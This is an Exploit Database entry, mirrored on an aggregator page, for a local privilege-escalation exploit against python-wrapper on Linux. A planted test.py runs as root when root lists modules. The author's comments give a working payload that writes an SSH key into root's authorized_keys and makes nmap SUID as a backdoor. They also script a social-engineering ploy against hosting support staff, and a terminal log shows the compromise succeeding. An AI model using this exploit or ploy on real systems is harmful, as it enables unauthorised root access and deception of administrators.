python-wrapper – Untrusted Search Path/Code Execution

• Exploit Database
• 122 阅读

• 作者： ShadowHatesYou
  日期： 2012-07-02
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/19523/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175

  # python-wrapper untrusted search path/code execution vulnerability # # Python-wrapper executes any test.py script within the current working directory, when supplied with help('modules'). # A non-priviledged user may gain code execution by tricking root to help('modules') or help() and then modules from within python-wrapper # while within a non-priviledged user's work directory. # # The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command, and then continuing normally # with no signs of compromise if you redirect command output. os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not # work, however os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does. # # # Additionally, nmap makes a great backdoor from a non-priviledged user account because it's something that looks like you might actually # want SETUID under certain circumstances, but not really(and it will bitch if invoked). In nmap 5.31DC1 the most useful switch(--interactive) was removed # which previously allowed you to bang out a shell(!/bin/csh, but not bash). Thank you David/Juan Carlos Castro for breaking one of my favorites. # NOW however there is the nmap scripting engine to exploit. As usual, the input-output commands will behave like any exploitable SETUID program # with input-output commands. # # # A practical example of how this vulnerability could be useful is if you wish to attack a shared webhosting enviornment. # After convincing root(support) to cd in to your directory, perhaps by uploading a broken "distraction.py" and getting him to troubleshoot it, # you could pose the question: "Hey, what python modules do you guys have installed?" "I'm not quite sure how to list that..." # "You can list the modules installed by entering python-wrapper, and typing help('modules')" "Oh!" *silent test.py execution by root* # "There's a lot of them... would you like them as an email attachment?" "Yeah, thanks. I think I'll look at that and try troubleshooting this more myself". # # # - ShadowHatesYou (Shadow@SquatThis.net) # 6/30/12   root@tourian:/home/shadow/python# ls -hl test.py -rw-r--r-- 1 shadow shadow 137 Jun 30 13:06 test.py root@tourian:/home/shadow/python# cat test.py #!/bin/python import os os.system('/bin/echo $(echo "ssh-rss pwned byshadow" >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap')   root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap -rwxr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap root@tourian:/home/shadow/python# ls -hl /root/.ssh/authorized_keys ls: cannot access /root/.ssh/authorized_keys: No such file or directory root@tourian:/home/shadow/python# python-wrapper Python 2.7.3 (default, May4 2012, 00:13:26) [GCC 4.6.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> help('modules')   Please wait a moment while I gather a list of all available modules...     ArgImagePlugin_bisect email pprint BaseHTTPServer_codecs encodings pptransport Bastion _codecs_cnerrno ppworker BdfFontFile _codecs_hkexceptionsprofile BeautifulSoup _codecs_iso2022 fcntl pstats BeautifulSoupTests_codecs_jpfilecmp pty BitTornado_codecs_krfileinput pwd BmpImagePlugin_codecs_twfnmatch py_compile BufrStubImagePlugin _collectionsformatter pyclbr CDROM _cracklib fpformatpydoc CGIHTTPServer _csvfractions pydoc_data ConfigParser_ctypes ftplibpyexpat ContainerIO _ctypes_testfunctools pyrit_cli Cookie_curses future_builtins pyximport Crypto_curses_panel gamin quopri CurImagePlugin_elementtreegcrandom Cython_emerge gdbmre DLFCN _functoolsgenericpath readline DcxImagePlugin_gamingentoolkitrepoman DocXMLRPCServer _gv getoptrepr EpsImagePlugin_hashlibgetpass resource ExifTags_heapqgettext rexec FitsStubImagePlugin _hotshotgit_remote_helpersrfc822 FliImagePlugin_imagingglobrlcompleter FontFile_imagingftgrp robotparser FpxImagePlugin_imagingmathgvrrdtool GbrImagePlugin_io gziprunpy GdImageFile _json hashlib scapy GifImagePlugin_lcms heapq sched GimpGradientFile_ldns hmacscipy GimpPaletteFile _locale hotshot select GribStubImagePlugin _lsprof htmlentitydefssets HTMLParser_md5htmllib setuptools Hdf5StubImagePlugin _multibytecodec httplib sgmllib IN_multiprocessingihookssha IcnsImagePlugin _pyio imaplib shelve IcoImagePlugin_random imghdrshlex ImImagePlugin _shaimp shutil Image _sha256 importlib signal ImageChops_sha512 imputil site ImageCms_socket inspect smtpd ImageColor_sreiosmtplib ImageDraw _sslitertools sndhdr ImageDraw2_strptime java_config_2 socket ImageEnhance_struct javatoolkit spwd ImageFile _symtable jsonsre ImageFileIO _testcapi keyword sre_compile ImageFilter _threading_locallcmssre_constants ImageFont _unboundldnssre_parse ImageGL _warnings ldnsx ssl ImageGrab _weakreflib2to3 stat ImageMath _weakrefset libsvnstatvfs ImageMode _xmlpluslibxml2 string ImageOpsabc libxml2modstringold ImagePaletteaifclibxslt stringprep ImagePath antigravity libxsltmodstrop ImageQt anydbmlinecache struct ImageSequence argparselinuxaudiodev subprocess ImageShow array localesunau ImageStat ast logging sunaudio ImageTk asynchatlxmlsvn ImageTransformasyncoremacpath symbol ImageWinatexitmacurl2path symtable ImtImagePluginaudiodevmagic sys IptcImagePlugin audioop mailbox sysconfig JpegImagePlugin base64mailcap syslog McIdasImagePlugin bdb markupbasetabnanny MicImagePluginbinasciimarshal tarfile MimeWriterbinhexmathtelnetlib MpegImagePlugin bisectmd5 tempfile MspImagePluginbs4 mhlib termios OleFileIO bz2 mimetools test OpenIPMIcPickle mimetypes textwrap PAM cProfilemimifythis PIL cStringIO mirrorselectthread PSDrawcalendarmmapthreading PaletteFile cgi modulefindertime PalmImagePlugin cgitb multifile timeit PcdImagePluginchunk multiprocessing toaiff PcfFontFile cmath mutex token PcxImagePlugincmd netrc tokenize PdfImagePlugincodenetsnmp trace PixarImagePlugincodecsnew traceback PngImagePlugincodeopnis tty PpmImagePlugincollections nntplib types PsdImagePlugincolorsysntpathunbound Queue commandsnturl2pathunboundmodule SgiImagePlugincompileallnumbers unicodedata SimpleHTTPServercompilernumpy unittest SimpleXMLRPCServercontextlibopcodeurllib SocketServercookielib operatorurllib2 SpiderImagePlugin copyoptparseurlparse StringIOcopy_regosuser SunImagePlugincpyritos2emxpathuu TYPES cracklibossaudiodev uuid TarIO crypt paramikowarnings TiffImagePlugin ctypespdb weakref TiffTagscursespicklewebbrowser UserDictcythonpickletools whichdb UserListdatetimepipes wsgiref UserStringdbm pkg_resources xattr WalImageFiledecimal pkgutil xcbgen WmfImagePlugindifflib platformxdelta3main XVThumbImagePlugindircacheplistlibxdrlib XbmImagePlugindis popen2xen XpmImagePlugindistutils poplibxml _LWPCookieJar dnetportage xmllib _MozillaCookieJar doctest posix xmlrpclib _OpenIPMI drv_libxml2 posixfile xxsubtype __builtin__ dumbdbm posixpath yasm __future__dummy_threadppzipfile _abcoll dummy_threading ppautozipimport _asteasy_installppcommonzlib   Enter any module name to get more help.Or, type "modules spam" to search for modules whose descriptions contain the word "spam".   >>> quit() root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap -rwsr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap root@tourian:/home/shadow/python# cat /root/.ssh/authorized_keys ssh-rss pwned byshadow     # Wish I had DuoSecurity! # See you at Defcon!